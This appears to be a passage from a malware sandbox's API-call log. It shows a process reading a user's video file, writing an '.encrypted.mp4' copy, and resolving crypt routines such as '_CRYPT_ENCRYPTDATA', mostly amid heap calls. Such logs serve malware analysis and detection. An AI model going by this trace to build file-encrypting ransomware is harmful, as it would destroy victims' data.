lpMsg=0x6aed6c) returned 0 [0042.402] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\eahi4-2wsrei.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.402] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.402] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0042.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.403] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.403] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.403] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0042.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.404] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl")) returned 0x10 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\eahI4-2wsRei.encrypted.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\eahi4-2wsrei.encrypted.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.405] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.406] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0042.406] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0042.406] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0042.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0042.407] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0042.407] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0042.409] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x65e8, lpOverlapped=0x0) returned 1 [0042.410] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0042.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0042.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.410] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165e8) returned 0xac2018 [0042.411] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0042.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.412] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0042.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0042.412] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165e8) returned 0x935008 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165e8) returned 0xac2018 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.414] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0042.414] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0042.414] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.415] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0042.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165e8) returned 0xac2018 [0042.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0042.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da378 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0042.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3b8 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0042.415] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.415] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0042.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x165e8) returned 0x94b5f8 [0042.416] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0042.417] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0042.417] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0042.417] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0042.417] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0042.418] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0042.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3a8 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0042.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.418] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0042.418] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 